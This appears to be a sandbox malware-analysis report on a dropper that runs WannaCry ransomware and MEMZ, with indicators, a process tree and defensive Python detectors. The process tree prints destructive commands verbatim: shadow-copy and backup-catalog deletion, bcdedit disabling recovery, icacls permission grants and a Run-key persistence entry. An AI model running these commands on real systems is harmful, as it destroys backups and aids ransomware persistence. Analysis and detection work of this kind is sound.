Analysis

max time kernel: 572s
max time network: 599s
platform: windows10-2004_x64
resource: win10v2004-20230220-en
resource tags: arch:x64, arch:x86, image:win10v2004-20230220-en, locale:en-us, os:windows10-2004-x64, system
submitted: 16-03-2023 04:27

Static task: static1
Behavioral task: behavioral1 (sample Word.exe, resource win7-20230220-en)
Behavioral task: behavioral2 (sample Word.exe, resource win10v2004-20230220-en)

The signatures and process tree below are from the Windows 10 2004 run (behavioral2).
General

Target: Word.exe
Size: 3.6MB
MD5: e8340564caba7a2635af2c79cb7103eb
SHA1: 8c62c79508abe5ffa36608d1846dcb20b2a27137
SHA256: acd5f35bfcc91c197d8ea08afe588454233114500255ed842b0589dc194ec466
SHA512: b6dc6dfeff210222ee904ad9c8dc832e4bf9c27a84298d2817e320bd9308e6d647a5efcf6845a0ed2b0cebdb6539257cd07428bbdce3d5d5db23e8614503d9d2
SSDEEP: 98304:/uWtmPx3xiobns6osz1gyQ4BL995Bt9JWpVi6q:/9m5hi0HBtQ4P95L9g3i6q

These hashes identify the submitted dropper, Word.exe. They do not identify the WannaCry binary it writes to disk and runs (ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, a 64-hex-character file name of the kind given to samples stored by SHA-256) or the MEMZ.exe it also launches; hunt for those by their own hashes, not by the hashes above.
Malware Config

Extracted from: C:\Users\Admin\AppData\Local\Temp\@Please_Read_Me@.txt
Family: wannacry
Bitcoin address: 12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw

The address was pulled from the dropped ransom note and is one of the three payment addresses hard-coded in the original 2017 WannaCry binaries, so it identifies the family rather than this particular operator.
Signatures

Wannacry
WannaCry is a ransomware cryptoworm. In this run the WannaCry component is the dropped ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe (PID 1572); the submitted Word.exe is a wrapper that also starts MEMZ.exe (PID 4236), which accounts for the MBR write and the assorted Windows programs seen later in this report.

Deletes shadow copies (2 TTPs)
Ransomware deletes shadow copies and other backups to inhibit system recovery. The command line that does it here is visible in the process tree below: cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit ... & wbadmin delete catalog -quiet, launched from @WanaDecryptor@.exe vs.
-
Modifies extensions of user files (22 IoCs)
Ransomware generally changes the extension on encrypted files. The rows below show the two-step pattern: the encrypted copy is created as <file>.WNCRYT, then renamed to <file>.WNCRY once it is complete; the original (e.g. CompareCopy.tiff) is opened for modification first.
Process for every row: ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
  File renamed  C:\Users\Admin\Pictures\LockGroup.tif.WNCRYT => C:\Users\Admin\Pictures\LockGroup.tif.WNCRY
  File created  C:\Users\Admin\Pictures\RemoveLimit.raw.WNCRYT
  File opened for modification  C:\Users\Admin\Pictures\RevokeOptimize.tif.WNCRY
  File created  C:\Users\Admin\Pictures\SkipExport.tif.WNCRYT
  File created  C:\Users\Admin\Pictures\SubmitExport.tif.WNCRYT
  File opened for modification  C:\Users\Admin\Pictures\CompareCopy.tiff
  File created  C:\Users\Admin\Pictures\CompareCopy.tiff.WNCRYT
  File renamed  C:\Users\Admin\Pictures\CompareCopy.tiff.WNCRYT => C:\Users\Admin\Pictures\CompareCopy.tiff.WNCRY
  File renamed  C:\Users\Admin\Pictures\RemoveLimit.raw.WNCRYT => C:\Users\Admin\Pictures\RemoveLimit.raw.WNCRY
  File created  C:\Users\Admin\Pictures\RevokeOptimize.tif.WNCRYT
  File created  C:\Users\Admin\Pictures\LockGroup.tif.WNCRYT
  File opened for modification  C:\Users\Admin\Pictures\RemoveLimit.raw.WNCRY
  File renamed  C:\Users\Admin\Pictures\RevokeOptimize.tif.WNCRYT => C:\Users\Admin\Pictures\RevokeOptimize.tif.WNCRY
  File created  C:\Users\Admin\Pictures\InvokeReset.tif.WNCRYT
  File opened for modification  C:\Users\Admin\Pictures\InvokeReset.tif.WNCRY
  File opened for modification  C:\Users\Admin\Pictures\LockGroup.tif.WNCRY
  File renamed  C:\Users\Admin\Pictures\SkipExport.tif.WNCRYT => C:\Users\Admin\Pictures\SkipExport.tif.WNCRY
  File opened for modification  C:\Users\Admin\Pictures\SkipExport.tif.WNCRY
  File renamed  C:\Users\Admin\Pictures\SubmitExport.tif.WNCRYT => C:\Users\Admin\Pictures\SubmitExport.tif.WNCRY
  File opened for modification  C:\Users\Admin\Pictures\SubmitExport.tif.WNCRY
  File opened for modification  C:\Users\Admin\Pictures\CompareCopy.tiff.WNCRY
  File renamed  C:\Users\Admin\Pictures\InvokeReset.tif.WNCRYT => C:\Users\Admin\Pictures\InvokeReset.tif.WNCRY
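The create-then-rename pattern in the rows above is what a file-event detector should key on rather than the literal .WNCRY string. The following is an added example, not code from the sandbox or from the sample: it replays file-event rows in the exact shape this report prints them and flags a process that leaves several user files under an appended extension, while letting an application that saves through a temp file and restores the original name pass. The USER_EXTS list, the min_files threshold and the two winword.exe rows are assumptions constructed for the example; the nine WannaCry rows are copied from the table above.

```python
import re
from collections import defaultdict

# Added example for this report; not code from the sandbox or the sample.
# Replays "File created <path> <process>" and
# "File renamed <old> => <new> <process>" rows and looks for the
# create <file>.<tmpext> / rename to <file>.<finalext> two-step.

EVENT_RE = re.compile(
    r"^(File created|File renamed|File opened for modification) "
    r"(.+?)(?: => (.+?))? (\S+)$"
)

# Assumption: a small, illustrative set of "user document" extensions.
USER_EXTS = {"tif", "tiff", "raw", "jpg", "png", "docx", "xlsx", "pdf"}

WANNACRY = "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe"
PICS = r"C:\Users\Admin\Pictures"

# Constructed sample: nine rows copied from the report's table plus two rows
# of ordinary winword.exe save-through-temp behaviour, which must not fire.
SAMPLE_EVENTS = "\n".join([
    f"File opened for modification {PICS}\\CompareCopy.tiff {WANNACRY}",
    f"File created {PICS}\\CompareCopy.tiff.WNCRYT {WANNACRY}",
    f"File renamed {PICS}\\CompareCopy.tiff.WNCRYT => {PICS}\\CompareCopy.tiff.WNCRY {WANNACRY}",
    f"File created {PICS}\\LockGroup.tif.WNCRYT {WANNACRY}",
    f"File renamed {PICS}\\LockGroup.tif.WNCRYT => {PICS}\\LockGroup.tif.WNCRY {WANNACRY}",
    f"File created {PICS}\\RemoveLimit.raw.WNCRYT {WANNACRY}",
    f"File renamed {PICS}\\RemoveLimit.raw.WNCRYT => {PICS}\\RemoveLimit.raw.WNCRY {WANNACRY}",
    f"File created {PICS}\\SkipExport.tif.WNCRYT {WANNACRY}",
    f"File renamed {PICS}\\SkipExport.tif.WNCRYT => {PICS}\\SkipExport.tif.WNCRY {WANNACRY}",
    r"File created C:\Users\Admin\Documents\report.docx.tmp winword.exe",
    r"File renamed C:\Users\Admin\Documents\report.docx.tmp => C:\Users\Admin\Documents\report.docx winword.exe",
])


def split_added_ext(path):
    """If path is <stem>.<added> and <stem> itself still ends in a user-document
    extension, return (stem, added); otherwise None."""
    stem, dot, added = path.rpartition(".")
    if not dot or not added:
        return None
    if stem.rpartition(".")[2].lower() in USER_EXTS:
        return stem, added
    return None


def extension_changes(event_text):
    """Return {process: {original_path: added_ext_or_None}} after replaying
    the events. None means the file got its original name back."""
    created = defaultdict(set)   # per process: paths it created under an added ext
    state = defaultdict(dict)
    for line in event_text.splitlines():
        m = EVENT_RE.match(line)
        if not m:
            continue
        event, path, newpath, proc = m.groups()
        if event == "File created":
            hit = split_added_ext(path)
            if hit:
                created[proc].add(path)
                state[proc][hit[0]] = hit[1]
        elif event == "File renamed" and path in created[proc]:
            stem, _ = split_added_ext(path)
            new = split_added_ext(newpath)
            if new and new[0] == stem:
                state[proc][stem] = new[1]      # temp extension swapped for final one
                created[proc].add(newpath)
            elif newpath == stem:
                state[proc][stem] = None        # original name restored: benign save
            created[proc].discard(path)
    return state


def flag_ransomware(event_text, min_files=3):
    """Processes that left at least min_files user files under an added
    extension, mapped to (file count, sorted extensions they ended with)."""
    verdicts = {}
    for proc, files in extension_changes(event_text).items():
        held = [ext for ext in files.values() if ext]
        if len(held) >= min_files:
            verdicts[proc] = (len(held), sorted(set(held)))
    return verdicts


if __name__ == "__main__":
    for proc, (n, exts) in flag_ransomware(SAMPLE_EVENTS).items():
        print(f"{proc}: {n} user files left under {exts}")
```

On the sample above only the WannaCry process is reported, with four files ending in WNCRY; winword.exe is not, because its temp file was renamed back to the original name. A production version would also require the original file to have been opened first (the report shows that for CompareCopy.tiff) and would count files per minute rather than per run.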
Checks computer location settings (2 TTPs, 3 IoCs)
Looks up the country code configured in the registry, which is how geofenced malware decides whether to run. Ordinary runtime code reads this value too, and no country-dependent behaviour was observed in this run, so on its own it is weak evidence.
Processes: MEMZ.exe, Word.exe
  Key value queried: \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\International\Geo\Nation (MEMZ.exe)
  Key value queried: \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\International\Geo\Nation (MEMZ.exe)
  Key value queried: \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\International\Geo\Nation (Word.exe)

Drops startup file (2 IoCs)
Processes: ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
  File opened for modification: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SDD537.tmp
  File opened for modification: C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\~SDD55D.tmp
Both files are .tmp names rather than an executable or a shortcut. The sandbox raises this signature for any write under a Startup folder, so check what these files contained before treating them as an autostart mechanism; the confirmed persistence in this run is the Run key below.
Executes dropped EXE (64 IoCs)
Processes (PIDs in order of first appearance within each image; the list is capped at 64 rows):
  ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe: 1572
  MEMZ.exe: 4236, 1336, 1844, 4108, 3696, 812, 4828
  taskhsvc.exe: 4736
  taskdl.exe: 1464, 3348, 5176, 3764, 5988, 5768, 2632, 5988, 5476, 2716, 1636, 1328, 1892, 6032, 5652, 5928, 1452, 7048
  taskse.exe: 4544, 1656, 5180, 6044, 5388, 2628, 4020, 4252, 5580, 1736, 748, 452, 632, 704, 5868, 3524, 7040, 848
  @WanaDecryptor@.exe: 2088, 2500, 1284, 4332, 2532, 5012, 4256, 4904, 6052, 1468, 5612, 2852, 4792, 4972, 4944, 3880, 5328, 320, 7084
The taskdl.exe / taskse.exe / @WanaDecryptor@.exe trio is relaunched in rounds for the whole 572 s run, which is why it dominates the list. PIDs are reused over a run of this length (5988 appears twice for taskdl.exe, and 320 is both a WMIC.exe and a @WanaDecryptor@.exe instance elsewhere in this report), so match on PID and image together when cross-referencing sections.

Loads dropped DLL (8 IoCs)
Processes: taskhsvc.exe (PID 4736), 8 rows
taskhsvc.exe is the Tor client the sample unpacks to TaskData\Tor\ and starts from @WanaDecryptor@.exe co (see the process tree); the eight rows are its own bundled DLLs being loaded. The report does not list the DLL names.
Modifies file permissions (1 TTPs, 1 IoCs)
No row is listed here, but the process tree shows the action: icacls . /grant Everyone:F /T /C /Q on the sample's working directory, run right after attrib +h . hides that directory.

Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials. No process or file is listed for this signature in the report, so treat it as unconfirmed for this sample; note that Microsoft Edge itself was running in the sandbox.

Unexpected DNS network traffic destination (1 IoCs)
Traffic on the DNS port to a server other than the configured DNS servers was detected. The report does not attribute it to a process.
  Destination IP: 37.123.163.58
Adds Run key to start application (2 TTPs, 2 IoCs)
Processes: reg.exe
  Key created: \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run (reg.exe)
  Set value (str): \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\qpzmehtw499 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\tasksche.exe\"" (reg.exe)
The entry is written through reg.exe rather than by the sample itself, lands under WOW6432Node because the 32-bit sample runs on a 64-bit host, uses a random value name, and points at tasksche.exe in the user's Temp directory. An autostart whose target is in a user-writable directory is the thing to alert on; the value name will differ per infection.
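The row above is also a parsing exercise: the report prints value data with C-style escaping, so the quoted path has to be unescaped before the target can be checked. The following is an added example, not code from the sandbox or from the sample: it reads "Set value" rows in the report's own format, undoes the escaping, and flags Run/RunOnce entries whose target lives in a user-writable directory. The USER_WRITABLE list and the benign SecurityHealth row are assumptions constructed for the example; the other two rows are copied from this report.

```python
import re

# Added example for this report; not sandbox or sample code.

SET_VALUE_RE = re.compile(
    r'^Set value \((?P<type>\w+)\) (?P<key>\\REGISTRY\\.+?)\\(?P<name>[^\\]+?) '
    r'= "(?P<data>.*)" (?P<proc>\S+)$'
)
RUN_KEY_RE = re.compile(r"\\CurrentVersion\\Run(Once)?$", re.IGNORECASE)

# Assumption: directories a standard user can write to; extend per estate.
USER_WRITABLE = (
    "\\AppData\\Local\\Temp\\", "\\AppData\\Roaming\\", "\\ProgramData\\",
    "\\Users\\Public\\", "\\Windows\\Temp\\",
)

# Constructed sample: the report's Run-key row and wallpaper row, plus one
# benign Run entry (assumed, written by explorer.exe) that must not be flagged.
SAMPLE_ROWS = "\n".join([
    r'Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\qpzmehtw499 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\tasksche.exe\"" reg.exe',
    r'Set value (str) \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@WanaDecryptor@.bmp" ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe',
    r'Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SecurityHealth = "C:\\Windows\\system32\\SecurityHealthSystray.exe" explorer.exe',
])


def unescape(data):
    # Undo the report's escaping: backslash-quote becomes a quote, then a
    # doubled backslash becomes a single one. The order matters.
    return data.replace('\\"', '"').replace("\\\\", "\\")


def target_of(command):
    """Executable path from a Run value: the quoted path if quoted, else the
    first token."""
    command = command.strip()
    if command.startswith('"'):
        end = command.find('"', 1)
        return command[1:end] if end > 0 else command[1:]
    return command.split(" ", 1)[0]


def parse_set_values(text):
    """Yield one dict per 'Set value' row with the data already unescaped."""
    for line in text.splitlines():
        m = SET_VALUE_RE.match(line)
        if m:
            row = m.groupdict()
            row["data"] = unescape(row["data"])
            yield row


def suspicious_autostarts(text):
    """Run/RunOnce values whose target is under a user-writable directory."""
    alerts = []
    for row in parse_set_values(text):
        if not RUN_KEY_RE.search(row["key"]):
            continue
        exe = target_of(row["data"])
        if any(d.lower() in exe.lower() for d in USER_WRITABLE):
            alerts.append({"name": row["name"], "target": exe,
                           "proc": row["proc"], "key": row["key"]})
    return alerts


if __name__ == "__main__":
    for a in suspicious_autostarts(SAMPLE_ROWS):
        print(f"{a['proc']} set {a['key']}\\{a['name']} -> {a['target']}")
```

Only the qpzmehtw499 entry is returned: the wallpaper row is not under a Run key, and the SecurityHealth entry points into System32. The same parser handles the Wallpaper row in the "Sets desktop wallpaper" signature below.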
Writes to the Master Boot Record (MBR) (1 TTPs, 1 IoCs)
Bootkits write to the MBR to gain persistence at a level below the operating system.
Processes: MEMZ.exe
  File opened for modification: \??\PhysicalDrive0 (MEMZ.exe)
This hit belongs to the MEMZ.exe component, not to the WannaCry binary. Opening \??\PhysicalDrive0 for write from a user process is the raw-disk access to alert on regardless of what is written.

Drops file in System32 directory (1 IoCs)
Processes: mmc.exe
  File opened for modification: C:\Windows\System32\devmgmt.msc (mmc.exe)
mmc.exe is the Windows Management Console opening the Device Manager snap-in; it is one of the built-in programs launched during the run, not a file dropped by the sample.
Sets desktop wallpaper using registry (2 TTPs, 3 IoCs)
Processes: ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, @WanaDecryptor@.exe
  Set value (str): \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@WanaDecryptor@.bmp" (ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe)
  Set value (str): \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@WanaDecryptor@.bmp" (@WanaDecryptor@.exe)
  Set value (str): \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@WanaDecryptor@.bmp" (@WanaDecryptor@.exe)
The wallpaper is set by the main binary and then again by each decryptor instance, so the value is re-asserted throughout the run.

Drops file in Program Files directory (2 IoCs)
Processes: setup.exe
  File created: C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\55700faf-e542-4ee0-894d-a72871b5f06c.tmp (setup.exe)
  File opened for modification: C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20230316052823.pma (setup.exe)
These are Microsoft Edge's own setup metrics files (the timestamp in the .pma name matches the submission time); background noise from the sandbox image, not sample activity.
Drops file in Windows directory (57 IoCs)
Processes: mmc.exe
All 57 rows are "File created" by mmc.exe under C:\Windows\INF\ with a .PNF extension: c_fsinfrastructure, c_fscompression, digitalmediadevice, c_fsreplication, c_holographic, rdcameradriver, wsdprint, c_receiptprinter, c_ucm, c_fsvirtualization, c_apo, PerceptionSimulationSixDof, c_volume, c_swcomponent, c_computeaccelerator, c_fscopyprotection, c_fssecurityenhancer, c_magneticstripereader, c_display, c_fsquotamgmt, remoteposdrv, c_extension, dc1-controller, c_processor, c_fsphysicalquotamgmt, c_camera, c_fscfsmetadataserver, miradisp, c_sslaccel, c_media, c_fscontinuousbackup, rawsilo, c_fsopenfilebackup, c_mcx, c_smrdisk, ts_generic, c_firmware, c_scmdisk, c_scmvolume, c_netdriver, c_barcodescanner, c_fsactivitymonitor, c_fshsm, c_smrvolume, c_proximity, c_cashdrawer, c_fscontentscreener, c_fssystem, xusb22, c_fsundelete, c_fssystemrecovery, c_diskdrive, c_monitor, c_fsantivirus, c_linedisplay, oposdrv, c_fsencryption.
.PNF files are the precompiled INF caches Windows writes when Device Manager (devmgmt.msc, see above) loads the driver classes; this is a side effect of mmc.exe being opened during the run and should not be attributed to the sample.
Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s); common ransomware behaviour. No row is listed for this signature; the only raw-disk access shown in the report is the MEMZ.exe open of \??\PhysicalDrive0 above.

Checks SCSI registry key(s) (3 TTPs, 23 IoCs)
SCSI device information is often read to detect sandbox or virtual-machine environments. Every hit here, however, comes from Taskmgr.exe and mmc.exe, Windows' own Task Manager and Management Console, which read these keys as part of normal device enumeration; none are attributed to the sample's binaries, so the evasion interpretation does not apply to this run.
Processes: Taskmgr.exe, mmc.exe
All keys are under \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\:
  Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000
    key opened (Taskmgr.exe, mmc.exe); Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A opened (Taskmgr.exe); Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 opened (mmc.exe); FriendlyName queried (Taskmgr.exe, mmc.exe); ConfigFlags queried (mmc.exe)
  CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001
    key opened; Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 opened; Properties\{83da6326-97a6-4088-9453-a1923f573b29}\000A opened and queried; FriendlyName and Phantom queried (all mmc.exe)
  CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002
    key opened; Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 opened; Properties\{83da6326-97a6-4088-9453-a1923f573b29}\000A opened and queried; FriendlyName and Phantom queried (all mmc.exe)
  CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000
    key opened; Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 opened; FriendlyName and ConfigFlags queried (all mmc.exe)
Enumerates system info in registry (2 TTPs, 3 IoCs)
Processes: msedge.exe
  Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer (msedge.exe)
  Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName (msedge.exe)
  Key opened: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS (msedge.exe)
The BIOS reads come from Microsoft Edge running in the sandbox, not from the sample.

Modifies registry class (2 IoCs)
Processes: msedge.exe, MEMZ.exe
  Key created: \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ (msedge.exe)
  Key created: \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings (MEMZ.exe)

Modifies registry key (1 TTPs, 1 IoCs)
No row is listed for this signature in the report; the reg.exe Run-key write above is the only command-line registry modification shown.
Suspicious behavior: EnumeratesProcesses (64 IoCs)
Processes: MEMZ.exe only. Hits per PID: 1336 (16), 1844 (14), 4108 (12), 3696 (10), 812 (12). These are the five worker copies that MEMZ.exe 4236 spawns of itself (see WriteProcessMemory below), each repeatedly walking the process list.

Suspicious behavior: GetForegroundWindowSpam (1 IoCs)
Processes: Taskmgr.exe (PID 5392). Task Manager polling the foreground window; a built-in tool, not the sample.

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary (60 IoCs)
Processes: msedge.exe (PID 1324), 60 hits. Edge creates its child processes with the mitigation policy that blocks non-Microsoft-signed binaries, as Chromium-based browsers do; this is normal browser behaviour and unrelated to the sample.
Suspicious use of AdjustPrivilegeToken (64 IoCs)
Processes: taskse.exe, WMIC.exe, vssvc.exe, Taskmgr.exe, AUDIODG.EXE
  taskse.exe (PIDs 4544, 1656, 5180, 6044, 5388, 2628, 4020): SeTcbPrivilege, two rows per PID (14 rows). SeTcb ("act as part of the operating system") is the privilege needed to create processes in other logon sessions, consistent with taskse.exe pushing the decryptor UI into every interactive session.
  WMIC.exe (PID 320): SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege and privilege LUIDs 33, 34, 35, 36 (which the sandbox did not resolve to names), the whole set enabled twice (42 rows). wmic.exe enables every privilege it holds on every start, so the privilege list is not the indicator; its command line, wmic shadowcopy delete in the process tree, is.
  vssvc.exe (PID 2312): SeBackupPrivilege, SeRestorePrivilege, SeAuditPrivilege. The Volume Shadow Copy service starting to serve the deletion request.
  Taskmgr.exe (PID 5392): SeDebugPrivilege, SeSystemProfilePrivilege, SeCreateGlobalPrivilege.
  AUDIODG.EXE (PID 4748): LUID 33, SeIncBasePriorityPrivilege.
Note that PID 320 is also listed as a @WanaDecryptor@.exe instance in "Executes dropped EXE"; the PID was reused after WMIC.exe exited.
Suspicious use of FindShellTrayWindow (64 IoCs)
Processes: msedge.exe (PID 1324), 3 hits; Taskmgr.exe (PID 5392), 61 hits. Both are Windows components, not the sample.

Suspicious use of SendNotifyMessage (64 IoCs)
Processes: Taskmgr.exe (PID 5392), 64 hits.
Suspicious use of SetWindowsHookEx (59 IoCs)
Hits per process:
  Word.exe: 1192 (2)
  @WanaDecryptor@.exe: 2088 (2), 2500 (2), 1284 (2), 4332, 2532, 5012, 4256, 4904, 6052, 1468, 5612 (2), 2852, 4792, 4972, 4944, 3880, 5328, 320, 7084, 7144; 24 hits in total
  MEMZ.exe: 4828 (20)
  wordpad.exe: 2948 (5), 4416 (5)
  mmc.exe: 772 (1), 1916 (2)
The decryptor and MEMZ hooks are sample activity (MEMZ.exe 4828 is the copy that also opens notepad.exe, see WriteProcessMemory). wordpad.exe and mmc.exe are Windows programs opened during the run; their hooks are ordinary GUI behaviour. @WanaDecryptor@.exe 7144 appears here but not in the capped "Executes dropped EXE" list.
Suspicious use of WriteProcessMemory (64 IoCs)
The report logs three "wrote to memory" rows per parent/child pair, so the 64 rows collapse to the 21 complete process-creation edges below plus the first row of a 22nd, where the 64-row cap cuts the list off. PID 1572 is the dropped WannaCry binary (ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe) and is referred to by PID. Edges in order of appearance:
  1192 Word.exe -> 1572 (WannaCry binary)
  1572 -> 4284 attrib.exe
  1572 -> 1172 icacls.exe
  1572 -> 1464 taskdl.exe
  1572 -> 3284 cmd.exe
  3284 cmd.exe -> 3736 cscript.exe
  1192 Word.exe -> 4236 MEMZ.exe
  4236 MEMZ.exe -> 1336 MEMZ.exe
  4236 MEMZ.exe -> 1844 MEMZ.exe
  4236 MEMZ.exe -> 4108 MEMZ.exe
  4236 MEMZ.exe -> 3696 MEMZ.exe
  4236 MEMZ.exe -> 812 MEMZ.exe
  4236 MEMZ.exe -> 4828 MEMZ.exe
  4828 MEMZ.exe -> 1524 notepad.exe
  1572 -> 2088 @WanaDecryptor@.exe
  1572 -> 4084 cmd.exe
  4084 cmd.exe -> 2500 @WanaDecryptor@.exe
  2088 @WanaDecryptor@.exe -> 4736 taskhsvc.exe
  1572 -> 3348 taskdl.exe
  1572 -> 4544 taskse.exe
  1572 -> 1284 @WanaDecryptor@.exe
  1572 -> 4348 cmd.exe (first of its three rows only; list capped at 64)
Word.exe is therefore the parent of both payloads: the WannaCry branch under 1572 and the MEMZ branch under 4236.
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\Word.exe | "C:\Users\Admin\AppData\Local\Temp\Word.exe" | 1⤵
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe | "C:\Users\Admin\AppData\Local\Temp\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe" | 2⤵
- Modifies extensions of user files
- Drops startup file
- Executes dropped EXE
- Sets desktop wallpaper using registry
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\attrib.exe | attrib +h . | 3⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\icacls.exe | icacls . /grant Everyone:F /T /C /Q | 3⤵
- Modifies file permissions
-
C:\Users\Admin\AppData\Local\Temp\taskdl.exe | taskdl.exe | 3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c 311251678944450.bat | 3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cscript.exe | cscript.exe //nologo m.vbs | 4⤵
-
C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe | @WanaDecryptor@.exe co | 3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\TaskData\Tor\taskhsvc.exe | TaskData\Tor\taskhsvc.exe | 4⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\SysWOW64\cmd.exe | cmd.exe /c start /b @WanaDecryptor@.exe vs | 3⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe | @WanaDecryptor@.exe vs | 4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exe | cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet | 5⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe | wmic shadowcopy delete | 6⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\taskdl.exe | taskdl.exe | 3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\taskse.exe | taskse.exe C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe | 3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe | @WanaDecryptor@.exe | 3⤵
- Executes dropped EXE
- Sets desktop wallpaper using registry
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exe | cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "qpzmehtw499" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\tasksche.exe\"" /f | 3⤵
-
C:\Windows\SysWOW64\reg.exe | reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "qpzmehtw499" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\tasksche.exe\"" /f | 4⤵
- Adds Run key to start application
- Modifies registry key
-
C:\Users\Admin\AppData\Local\Temp\taskdl.exe | taskdl.exe | 3⤵
- Executes dropped EXE
-
